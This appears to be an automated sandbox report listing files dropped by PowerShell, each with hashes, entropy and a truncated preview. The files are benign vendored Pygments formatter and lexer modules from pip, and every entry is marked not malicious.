                                                                                                    SHA-256:89C1AC6F188E0D75F37967E7B6275036EAC1445EEA8567ACF19E0BED2037800F
                                                                                                    SHA-512:2CE80CC8B1F2A295E7C496389A7D2A58F788BDA480FCE3F52FDD423951B1C7F0138E9E02AF1D689BB7AA70BFBC492BA5FBC3572ECB0A78890C74E6712AB45A61
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.-........................t.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).a..... pygments.formatters.terminal256. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for 256-color terminal output with ANSI sequences... RGB-to-XTERM color conversion routines adapted from xterm256-conv. tool (http://frexx.de/xterm-256-notes/data/xterm256-conv2.tar.bz2). by Wolfgang Frisch... Formatter version 1... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...codes)...ansicolors..Terminal256Formatter..TerminalTrueColorFormatterc.....................,.....e.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...EscapeSequenceNc.....................J.....|.|._.........|.|._.........|.|._.........|.|._.........|.|._.........y...N)...fg..bg..bold..underline..italic)...selfr....r....r....r....r....s.... .wC:\Users\boadi\AppData\L
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with very long lines (341)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4176
                                                                                                    Entropy (8bit):4.849249007004006
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:aVN0VVz+V6ZVLVbsEbVxVnAwaVH/VRncVKgVLafVkVYlssVd16zLVz8XXVsZ+Vgl:aO0mBFbvJCtzcrof6tsbYLSX0+ETx
                                                                                                    MD5:75B034B791DB82C44433D5F0E25287A8
                                                                                                    SHA1:70C2241423F14E151908D1E41ED0F70154F1858B
                                                                                                    SHA-256:D42C37EC5B9094D69C9F144A9AD94F5F89F22E85FDFEDB64A39670B1C354659E
                                                                                                    SHA-512:07ACFFC0C0FDFB6C2E14FBC7CEECD127EF14FF64955E729C5DAB7CADBCB1640207094413B59DF9620BDDDF89692FDBE5D3E031B6DB5F68107C0FD564B7A7C9CF
                                                                                                    Malicious:false
                                                                                                    Preview:# Automatically generated by scripts/gen_mapfiles.py..# DO NOT EDIT BY HAND; run `tox -e mapfiles` instead...FORMATTERS = {. 'BBCodeFormatter': ('pygments.formatters.bbcode', 'BBCode', ('bbcode', 'bb'), (), 'Format tokens with BBcodes. These formatting codes are used by many bulletin boards, so you can highlight your sourcecode with pygments before posting it there.'),. 'BmpImageFormatter': ('pygments.formatters.img', 'img_bmp', ('bmp', 'bitmap'), ('*.bmp',), 'Create a bitmap image from source code. This uses the Python Imaging Library to generate a pixmap from the source code.'),. 'GifImageFormatter': ('pygments.formatters.img', 'img_gif', ('gif',), ('*.gif',), 'Create a GIF image from source code. This uses the Python Imaging Library to generate a pixmap from the source code.'),. 'GroffFormatter': ('pygments.formatters.groff', 'groff', ('groff', 'troff', 'roff'), (), 'Format tokens with groff escapes to change their color and font style.'),. 'HtmlFormatter': ('pygments
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3314
                                                                                                    Entropy (8bit):4.362666351747487
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:YhGEoEbqI2SlHv7obkmjkeBWKoxGPfabS2dlum1HxWRFRi7LH+W6fV6HgW6f1l:YhFDoSRvak0bBG8nErx1gR+eWy6AWyl
                                                                                                    MD5:4350BFE3B4B875BAC9B50B13F0A4E028
                                                                                                    SHA1:A3D39FE035B11FE1A67BDFB935A8106150D29267
                                                                                                    SHA-256:AF56FBC33593268B800C32E1F99D758918B8890C43D09289D6A1E5EA6398C6C0
                                                                                                    SHA-512:CB6E19FEFEFF30C68D2FA7B05ED8F9BDF4658815ADC0E436E7C6B8BBAF9781DDCF9CA30BBBC33BDF48C17B6BE9B867B5ACEE3AEA5877EA739EEE88107C28E77E
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.bbcode. ~~~~~~~~~~~~~~~~~~~~~~~~~~.. BBcode formatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""...from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_bool_opt..__all__ = ['BBCodeFormatter']...class BBCodeFormatter(Formatter):. """. Format tokens with BBcodes. These formatting codes are used by many. bulletin boards, so you can highlight your sourcecode with pygments before. posting it there... This formatter has no support for background colors and borders, as there. are no common BBcode tags for that... Some board systems (e.g. phpBB) don't support colors in their [code] tag,. so you can't use the highlighting together with that tag.. Text in a [code] tag usually is shown with a monospace font (which this. formatter can do with the ``monofont`` option) and no spaces (which you. need for indentation)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5094
                                                                                                    Entropy (8bit):4.254468602206663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YhHiDbbB18RnWEQUiGszU9r/75XpNS6nbeN5EQz7oFLb1D6:lB1InxiGL9rxpNSzpz7opxD6
                                                                                                    MD5:1EF0AC9570D12DBA0DEA78E067D93510
                                                                                                    SHA1:BA7EBFF6BEF1B782BBAC83582552213B1C815E48
                                                                                                    SHA-256:C72F197F7B573A8E8C5AB5E1EF23C65B1DE5544920FC3858E02C66B036F4215A
                                                                                                    SHA-512:0CB5A9CF1D2442DD3F9BAB521454256383B99C63637E14F6B1FE31ACAC21BD7B16C3A66E3A88926FB103B540B854F54C70E1BED85605CEC81F0F3FFBCFC2BE2A
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.groff. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for groff output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import math.from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_bool_opt, get_int_opt..__all__ = ['GroffFormatter']...class GroffFormatter(Formatter):. """. Format tokens with groff escapes to change their color and font style... .. versionadded:: 2.11.. Additional options accepted:.. `style`. The style to use, can be a string or a Style subclass (default:. ``'default'``)... `monospaced`. If set to true, monospace font will be used (default: ``true``)... `linenos`. If set to true, print the line numbers (default: ``false``)... `wrap`. Wrap lines to the specified number of characters. Disabled if set to 0. (default: ``0``).. """.. name = 'groff'. aliases =
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35610
                                                                                                    Entropy (8bit):4.3963797496228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VD05FhEEBGxIFiME72GTcnHS2bQt08aYUcfZHDwwMLF1AM0zxYP:Vwhp0Iiz2NnHSF08pBjEZEi
                                                                                                    MD5:ABE92D7FFA4F592BA33C4B980A8FAC86
                                                                                                    SHA1:CA4496D1DF41B8AA27158C66E63F640AB511D654
                                                                                                    SHA-256:3C8CC0CA294DA9A4F34923F6B250C6D950CB137A8D8A85B2DAB82D492A2F8AE2
                                                                                                    SHA-512:DD0BE30C9AAE21529F79E0B7815F53F55432537A056E0BF14BE77638C8F013B14957DD83C5B83E09459E24F12F5E2484CEB98F170D85D40FE2168F55094FEA59
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.html. ~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for HTML output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import functools.import os.import sys.import os.path.from io import StringIO..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Token, Text, STANDARD_TYPES.from pip._vendor.pygments.util import get_bool_opt, get_int_opt, get_list_opt..try:. import ctags.except ImportError:. ctags = None..__all__ = ['HtmlFormatter']..._escape_html_table = {. ord('&'): '&amp;',. ord('<'): '&lt;',. ord('>'): '&gt;',. ord('"'): '&quot;',. ord("'"): '&#39;',.}...def escape_html(text, table=_escape_html_table):. """Escape &, <, > as well as single and double quotes for HTML.""". return text.translate(table)...def webify(color):. if color.startswith('calc') or color.startswith('var'):. return color. else:. retu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21938
                                                                                                    Entropy (8bit):4.413503161579316
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:vIljThi956+foyyYhVeYfKaC9A/TSpdTVZbX:vIl/65ObYhg4TaTZbX
                                                                                                    MD5:DF7E2179349901F00DDBEBF6F9D9DAFE
                                                                                                    SHA1:D5FBA1A1563D08268E0B6B6032F9EAF231BF534B
                                                                                                    SHA-256:5CA5E6836FD738DAD1E26B6ADA37C453C5C2B28967DD54864F0F94622128932B
                                                                                                    SHA-512:402341810CEDA6849C380ED9CD50B84DEAD9978E1660AF4FBC8FA872B629613E117161F93DA064B797C59468C960F1BCCCC0BCFE7B0487672DBCF0E6FAA8593A
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.img. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pixmap output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import os.import sys..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_bool_opt, get_int_opt, get_list_opt, \. get_choice_opt..import subprocess..# Import this carefully.try:. from PIL import Image, ImageDraw, ImageFont. pil_available = True.except ImportError:. pil_available = False..try:. import _winreg.except ImportError:. try:. import winreg as _winreg. except ImportError:. _winreg = None..__all__ = ['ImageFormatter', 'GifImageFormatter', 'JpgImageFormatter',. 'BmpImageFormatter']...# For some unknown reason every font calls it something different.STYLES = {. 'NORMAL': ['', 'Roman', 'Book', 'Normal', 'Regular', 'Medium'],. 'ITALIC': ['Oblique', 'Italic'],. 'BOLD':
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4981
                                                                                                    Entropy (8bit):4.605688600636415
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YvjDbE7kDiPMairm3UhwJ7T5TccSCuyoCbnR2NtotF/mvy50y+xvGv2Edcrjx7kT:ixRmcXFWRcCrmvy50y+xuve573jfvo
                                                                                                    MD5:C3510AB1404908F9C672053BE75354B0
                                                                                                    SHA1:5B8318E11DA76CA37C2CB38946024C206A0637DA
                                                                                                    SHA-256:129FA6F23777BE814EE85BF9EDC506166CFA25503AEC8120CA204EC2FD0DE1AD
                                                                                                    SHA-512:28FFD4CA8F93ED7C002CF5DF21C6F8E968963892B0F8B948FB2ABEB55FD195FD73EC827BA76B21984DF994E8A2643E745DCDADF04EC5BC40D357D31B79BAA038
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.irc. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for IRC output.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Keyword, Name, Comment, String, Error, \. Number, Operator, Generic, Token, Whitespace.from pip._vendor.pygments.util import get_choice_opt...__all__ = ['IRCFormatter']...#: Map token types to a tuple of color values for light and dark.#: backgrounds..IRC_COLORS = {. Token: ('', ''),.. Whitespace: ('gray', 'brightblack'),. Comment: ('gray', 'brightblack'),. Comment.Preproc: ('cyan', 'brightcyan'),. Keyword: ('blue', 'brightblue'),. Keyword.Type: ('cyan', 'brightcyan'),. Operator.Word: ('magenta', 'brightcyan'),. Name.Builtin: ('cyan', 'brightcyan'),. Nam
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19351
                                                                                                    Entropy (8bit):4.494553765676379
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:XgU1RQ98hoPWa4YFjB/ltd0kgE/5+sFElmKJ+uW5zzJ:XRQ98hJa4GBNvV/5+sqYKArt
                                                                                                    MD5:E5EE23B49F2EB7EC4FF2D668A515EBBA
                                                                                                    SHA1:9C53C6B35022251DC6EDDA5D00CF905953F789C0
                                                                                                    SHA-256:146CC9F98A924C4F33FEFA163DDCEF2D8E53ABC8C4FF28231A333A757649F3E9
                                                                                                    SHA-512:A68EFCCBE00F2BF93E0735939ABBAB0934F46AB7ACB0D1E757FFB3A53556DC94E0BCDC23BAE3E7986225C1AD6C8169D0574A01FEB37CCE7ABEF6971FD20AE67A
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.latex. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for LaTeX fancyvrb output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from io import StringIO..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.lexer import Lexer, do_insertions.from pip._vendor.pygments.token import Token, STANDARD_TYPES.from pip._vendor.pygments.util import get_bool_opt, get_int_opt...__all__ = ['LatexFormatter']...def escape_tex(text, commandprefix):. return text.replace('\\', '\x00'). \. replace('{', '\x01'). \. replace('}', '\x02'). \. replace('\x00', r'\%sZbs{}' % commandprefix). \. replace('\x01', r'\%sZob{}' % commandprefix). \. replace('\x02', r'\%sZcb{}' % commandprefix). \. replace('^', r'\%sZca{}' % commandprefix). \. replace('_', r'\%sZus{}' % commandprefix). \.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5073
                                                                                                    Entropy (8bit):4.485076089343685
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YcjDxbl10ZQy43M14Q4EJmBa8D+wPjzwPS3YD02iZ9Eeo74EWH1N4u:Hv0j43M14QfynyS3YD0HNoPWn
                                                                                                    MD5:8FB3EFA99D9F5AF4B315C815EE8AF643
                                                                                                    SHA1:04C749953F070666BD0A2F22C93B8A95522D9111
                                                                                                    SHA-256:80FC6493905D0335930A06C41E0D65A4B8BED45E993E1E40FDAA2D80B5C79F38
                                                                                                    SHA-512:00674E7D34C4367EC586C92A136202968CAEB7E7115C81F588AF6A087340131807402250B6D8145F33C933ECC8A66181F9A7E79000461A76697C4604151EA513
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.other. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Other formatters: NullFormatter, RawTokenFormatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_choice_opt.from pip._vendor.pygments.token import Token.from pip._vendor.pygments.console import colorize..__all__ = ['NullFormatter', 'RawTokenFormatter', 'TestcaseFormatter']...class NullFormatter(Formatter):. """. Output the text unchanged without any formatting.. """. name = 'Text only'. aliases = ['text', 'null']. filenames = ['*.txt'].. def format(self, tokensource, outfile):. enc = self.encoding. for ttype, value in tokensource:. if enc:. outfile.write(value.encode(enc)). else:. outfile.write(value)...class RawTokenFormatter(Formatter):. r""". Format tokens
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2212
                                                                                                    Entropy (8bit):4.3980651718244275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Y8WGUZDeRICvBlcYdfabNyZ6dWNFRi7vQWVbRRKWVbxfJv:YdjFeaCvfcqENWzNRWV2WVFh
                                                                                                    MD5:D59D5EBAF8BC5790E74F867760E9FFC8
                                                                                                    SHA1:9956F2778A8B2C934849F005E7E752E22B524FCC
                                                                                                    SHA-256:E8B2A741CF32878F5FF34D9B174B0FBDBCDC938422BCC62AAA85C03DA60FF2E5
                                                                                                    SHA-512:43B95EA6DAA2BAFDDC66AE91891B4016396CE418A400B15285639D7FC792AE5BFB86F31552D6EC28D3B4B067893FAA5C413CE597E44DD63DB01176E4965C6774
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.pangomarkup. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pango markup output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter...__all__ = ['PangoMarkupFormatter']..._escape_table = {. ord('&'): '&amp;',. ord('<'): '&lt;',.}...def escape_special_chars(text, table=_escape_table):. """Escape & and < for Pango Markup.""". return text.translate(table)...class PangoMarkupFormatter(Formatter):. """. Format tokens as Pango Markup code. It can then be rendered to an SVG... .. versionadded:: 2.9. """.. name = 'Pango Markup'. aliases = ['pango', 'pangomarkup']. filenames = [].. def __init__(self, **options):. Formatter.__init__(self, **options).. self.styles = {}.. for token, style in self.style:. start = ''. end = ''. if style['color']:.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5014
                                                                                                    Entropy (8bit):4.3942932168278555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YFyjDdsO7DspbB2oleCa6jbaoMIq2PL822ov30fW2c8u6:8O7IBB2o2YmQqWL82zEr
                                                                                                    MD5:B87C660D8F39001B1FB3C6D3B2C53524
                                                                                                    SHA1:E63A50CBCCCF45CE2E9AFFDA76CC00F670D155F8
                                                                                                    SHA-256:680D2FFE9B16E8A648DCDD7C4CA0E27F178BEA6705F040D770F5C3588E2F8554
                                                                                                    SHA-512:4052B721AC723A9AA24275E906FBB12183E24DF55F240C189D58E2A34B2158C2D30A96A514A2F97D9AB205CCBD745ED3F5406E2A8F3D4819A327342D95EFCBEE
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.rtf. ~~~~~~~~~~~~~~~~~~~~~~~.. A formatter that generates RTF files... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.util import get_int_opt, surrogatepair...__all__ = ['RtfFormatter']...class RtfFormatter(Formatter):. """. Format tokens as RTF markup. This formatter automatically outputs full RTF. documents with color information and other useful stuff. Perfect for Copy and. Paste into Microsoft(R) Word(R) documents... Please note that ``encoding`` and ``outencoding`` options are ignored.. The RTF format is ASCII natively, but handles unicode characters correctly. thanks to escape sequences... .. versionadded:: 0.6.. Additional options accepted:.. `style`. The style to use, can be a string or a Style subclass (default:. ``'default'``)... `fontface`.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7335
                                                                                                    Entropy (8bit):4.583952729263398
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ePWE6uUoqWLfpqnpjzjxK2jhE8kYqc3eTU+:enUoqQpejzNKgE8fZkR
                                                                                                    MD5:A4CB418CECBD1B90E53469555FA3F5C5
                                                                                                    SHA1:0FB3AC6EF25F83DB9877B5BB296C16149F01BC5F
                                                                                                    SHA-256:75038D5B2A5BCDFBF31820ED769DCCFCD25AC12709BCCD838876F1D64FB0C3B8
                                                                                                    SHA-512:B2F34BCA13E79B2E918E236B202EA8B360C409114454CBBF57C5AA65F93DF85E0DCA93E9CE47A26B9805C5CB6780CEF85748769EA9AC8E496C6FE5DA5979C6DB
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.svg. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for SVG output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Comment.from pip._vendor.pygments.util import get_bool_opt, get_int_opt..__all__ = ['SvgFormatter']...def escape_html(text):. """Escape &, <, > as well as single and double quotes for HTML.""". return text.replace('&', '&amp;'). \. replace('<', '&lt;'). \. replace('>', '&gt;'). \. replace('"', '&quot;'). \. replace("'", '&#39;')...class2style = {}..class SvgFormatter(Formatter):. """. Format tokens as an SVG graphics file. This formatter is still experimental.. Each line of code is a ``<text>`` element with explicit ``x`` and ``y``. coordinates containing ``<tspan>`` elements with the individual token sty
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4674
                                                                                                    Entropy (8bit):4.525673767034789
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Y+jDbE78oDCPMECairm3UhwJ7T5TccSCw/dev1vGESZREaRq0vlCDDdGXhcz7cF2:J2GwmcXT41uxa0vM/z7cND8r
                                                                                                    MD5:553F6C2A6AC4B0BF992FE22D97475324
                                                                                                    SHA1:AB7A1B9467ADF12A34D845776267A048D375ABAB
                                                                                                    SHA-256:146FABA6346916636988607837322E72FC6AEAC4085C1DC7393A3699E4CAB6B5
                                                                                                    SHA-512:DD66F018855E5DCC7297EE5AD153917AB1AB1466A1B98346F3018CA109555C1837CA7EC3A1908C782C580EC72C4B7ED6F855DBBB5D8DFBDA18D75CC8F9BD615A
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.terminal. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for terminal output with ANSI sequences... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.formatter import Formatter.from pip._vendor.pygments.token import Keyword, Name, Comment, String, Error, \. Number, Operator, Generic, Token, Whitespace.from pip._vendor.pygments.console import ansiformat.from pip._vendor.pygments.util import get_choice_opt...__all__ = ['TerminalFormatter']...#: Map token types to a tuple of color values for light and dark.#: backgrounds..TERMINAL_COLORS = {. Token: ('', ''),.. Whitespace: ('gray', 'brightblack'),. Comment: ('gray', 'brightblack'),. Comment.Preproc: ('cyan', 'brightcyan'),. Keyword: ('blue', 'brightblue'),. Keyword.Type: ('cyan', 'brightcyan'),. Operator.Word:
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11753
                                                                                                    Entropy (8bit):4.44812529232476
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:NBt0HK4hMdr0JqwBjc2wfoUlh6d/09pJLDSz79UaSUzaUz30BXeqJL/:54K0MPwBjcEdc94x0BXeS
                                                                                                    MD5:C4A9E20559C4424271DC1EE03FC4411E
                                                                                                    SHA1:9758CA0D25790D178FE0B9CFC3F8CA012D46841E
                                                                                                    SHA-256:D77489DC3E6915DA99F7344E13A1DB5A7043C07BCE184F0696C9AA1A1A6B469E
                                                                                                    SHA-512:E23C22338A0014541CA759E3717C957A2DF6F98F51DD6252E48FFEC181E4E27C276CD96951CF606D0D1C3A41D85A5974B5AE411BB7270C6E4D3D7ABBF69C0B20
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters.terminal256. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for 256-color terminal output with ANSI sequences... RGB-to-XTERM color conversion routines adapted from xterm256-conv. tool (http://frexx.de/xterm-256-notes/data/xterm256-conv2.tar.bz2). by Wolfgang Frisch... Formatter version 1... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..# TODO:.# - Options to map style's bold/underline/italic/border attributes.# to some ANSI attrbutes (something like 'italic=underline').# - An option to output "style RGB to xterm RGB/index" conversion table.# - An option to indicate that we are running in "reverse background".# xterm. This means that default colors are white-on-black, not.# black-on-while, so colors like "white background" need to be converted.# to "white background, black foreground", etc.....from pip._vendor.pygments.formatter import Formatter.from pip._v
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34618
                                                                                                    Entropy (8bit):4.190746563497643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:s3Nf24IDmMl4cZtM65YqtXwXNBZwahT+66o:sdf24M7RZtzYqwGahT+6l
                                                                                                    MD5:682751F490E0EE1C872A7F13B387CBCB
                                                                                                    SHA1:A7630EAC5CAB404716A0ABBEBC7CCBA1985AF756
                                                                                                    SHA-256:D81A6A2E54F6131BCE3A2EEF9E32B99C1E05A7E9B9DA57623DA5CCA31E6EC2E8
                                                                                                    SHA-512:60B9EEAC99107794B083697693C691E0AA3B5AD58873BCB29AD6E874C0CF03BADF87D65FEDE82B9D2F938B45152AAB231DDAFC7340C0760697A6EEAD0CC85D4E
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.lexer. ~~~~~~~~~~~~~~.. Base lexer classes... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import sys.import time..from pip._vendor.pygments.filter import apply_filters, Filter.from pip._vendor.pygments.filters import get_filter_by_name.from pip._vendor.pygments.token import Error, Text, Other, Whitespace, _TokenType.from pip._vendor.pygments.util import get_bool_opt, get_int_opt, get_list_opt, \. make_analysator, Future, guess_decode.from pip._vendor.pygments.regexopt import regex_opt..__all__ = ['Lexer', 'RegexLexer', 'ExtendedRegexLexer', 'DelegatingLexer',. 'LexerContext', 'include', 'inherit', 'bygroups', 'using', 'this',. 'default', 'words', 'line_re']..line_re = re.compile('.*?\n').._encoding_map = [(b'\xef\xbb\xbf', 'utf-8'),. (b'\xff\xfe\0\0', 'utf-32'),. (b'\0\0\xfe\xff', 'utf-32be'),. (b'\xff\xfe', '
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12130
                                                                                                    Entropy (8bit):4.5541396999823425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:yzahzSRS39vCmomv5pmv/qmwIXRJwUpFd5LEabrrHEbQHsmmk5zcjklSSiu:yzaCS39vCZUHUCpER9F54urItCjS4
                                                                                                    MD5:922BF9ADD1A73680FAF6F6EBBE8AB329
                                                                                                    SHA1:C976A3EBEDFF96FE93CC3EDBFD805250A73BA77C
                                                                                                    SHA-256:8F92848B93BF550E464B9F47E3D97ED7483350E9162B197019E54C9463B630C9
                                                                                                    SHA-512:AD30AD5999E0186DFD3D5A04079ECE2EECA23179BBD0400A87DBD00E283E27E7F1CF810CAD8FB8A14A73BD47D7BCA378753E1DDECBAA77DC6C2BC7933F1F4C71
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.lexers. ~~~~~~~~~~~~~~~.. Pygments lexers... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import sys.import types.import fnmatch.from os.path import basename..from pip._vendor.pygments.lexers._mapping import LEXERS.from pip._vendor.pygments.modeline import get_filetype_from_buffer.from pip._vendor.pygments.plugin import find_plugin_lexers.from pip._vendor.pygments.util import ClassNotFound, guess_decode..COMPAT = {. 'Python3Lexer': 'PythonLexer',. 'Python3TracebackLexer': 'PythonTracebackLexer',.}..__all__ = ['get_lexer_by_name', 'get_lexer_for_filename', 'find_lexer_class',. 'guess_lexer', 'load_lexer_from_file'] + list(LEXERS) + list(COMPAT).._lexer_cache = {}._pattern_cache = {}...def _fn_matches(fn, glob):. """Return whether the supplied file name fn matches pattern filename.""". if glob not in _pattern_cache:. pattern = _pattern_cache[glob] = re.c
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14663
                                                                                                    Entropy (8bit):5.524716202157973
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:UhwcQ8m+5UMD78Bmq5isJnOXRKipvP5ZlddHEunTxYSbeZRDWSiQLt1:ny54BPQsJnGRKg5Zld/TxYS8RDCQ51
                                                                                                    MD5:02E5C5FFB0DF49B145EC81968AA62BFF
                                                                                                    SHA1:526DB2D173A74A2A2D424A2FCD8D9F284EC523E8
                                                                                                    SHA-256:3C059976A7654E11E603600F0E37762D100C88DD2AE9B2A82AFC413D15BDA886
                                                                                                    SHA-512:70EC46BE27CEAD27F8659B3571E5FAD37DB679D6880C8C663A34D74815A5665DEECBBCEE16DF384B37903F8786EF05AB332F4DF19145FB9F59B1151D43906383
                                                                                                    Malicious:false
